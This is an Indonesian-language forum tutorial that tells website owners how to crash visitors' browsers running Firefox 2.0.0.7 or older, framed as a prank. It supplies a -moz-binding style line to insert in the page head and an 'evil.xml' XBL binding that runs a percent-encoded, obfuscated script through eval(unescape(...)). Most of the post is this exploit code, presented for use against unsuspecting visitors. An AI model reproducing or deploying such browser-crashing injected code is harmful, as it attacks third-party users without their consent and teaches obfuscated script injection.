XtGem Forum catalog

Mengerjai Pengunjung Situs Pengguna Mozilla Firefox V 2.0.0.7 Kebawah









-----------------------------------------------------------------------------------

Author : SPYRO KiD

-----------------------------------------------------------------------------------







Pengen ngerjai pengunjung? hehehe.. emangnya cuma pengunjung ajah yang bisa iseng, para admin jangan kalah iseng doong ;p Dengan beberapa script sederhana, anda bisa membuat Browser pengunjung anda mengalami crash. Target kita kali ini adalah para pengguna Mozilla Firefox V.2.0.0.7 kebawah.



1. Salin script berikut dan letakkan diantara tag <HEAD> halaman situs anda:



<style>BODY{-moz-binding:url("evil.xml#xss")}</style>



Misalnya:



<html>
<head><style>BODY{-moz-binding:url("evil.xml#xss")}</style>

<title>Judul halaman</title>

</head>
<body>Isi halaman situs anda...</body>

</html>



2. Salin script berikut, simpan dengan nama evil.xml dan uploadlah di directory

yang sama dengan halaman yang disisipi script di langkah pertama tadi.


<?xml version="1.0" ?>
- <bindings xmlns="http://www.mozilla.org/xbl">
- <binding id="xss">
- <implementation>
- <constructor>
- <![CDATA[ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29'));
]]>
</constructor>
</implementation>
</binding>
</bindings>



Cobalah akses halaman jebakan tadi menggunakan Mozilla Firefox V 2.0.0.7 kebawah. Browser anda akan mengalami Crash ^_^. Agar anda tidak mengalami nasib serupa, download ajah versi terbaru Mozilla Firefox.



Selamat mencoba.. ;)